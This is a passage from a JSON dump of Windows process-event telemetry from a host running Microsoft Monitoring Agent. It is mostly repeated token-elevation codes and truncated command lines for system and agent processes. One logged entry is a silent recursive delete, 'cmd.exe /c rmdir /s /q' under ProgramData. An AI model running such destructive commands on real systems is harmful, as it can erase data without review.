1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"NaN\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\",\"%%1936\"],\"__cmd_line$$\":[\"nan\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MonitoringHost.exe\\\" ...\",\"\\\"C:\\\\Windows\\\\system32\\\\unlodctr.exe\\\" \\\"cps etw data source\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\csc.exe\\\" /noconfig /fu...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\Microsoft.NET\\\\Framework64\\\\v4.0.30319\\\\cvtres.exe /NOLOGO /REA...\",\"\\\"C:\\\\Windows\\\\system32\\\\lodctr.exe\\\" \\\"C:\\\\Windows\\\\TEMP\\\\tmp110B.tmp\\\"\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c rmdir /s /q C:\\\\ProgramData\\\\Microsoft\\\\Win...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\cmd.exe /c WerFault.exe -k -q\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"WerFault.exe  -k -q\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"ChangeEventModuleBatchSize.v...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Windows\\\\system32\\\\cscript.exe\\\" /nologo \\\"ChangeEventModuleBatchSize.v...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\secedit.exe /export /cfg \\\"C:\\\\Program Files\\\\Microsof...\",\"C:\\\\Windows\\\\system32\\\\secedit.exe /export /mergedpolicy /cfg \\\"C:\\\\Program ...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\Health Service State...\",\"\\\\??\\\\C:\\\\Windows\\\\system32\\\\conhost.exe 0xffffffff -ForceV1\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -secured -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelpe...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelpe...\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelpe...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"\\\"C:\\\\Program Files\\\\Microsoft Monitoring Agent\\\\Agent\\\\MOMPerfSnapshotHelpe...\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe -Embedding\",\"C:\\\\Windows\\\\system32\\\\wbem\\\\wmiprvse.exe 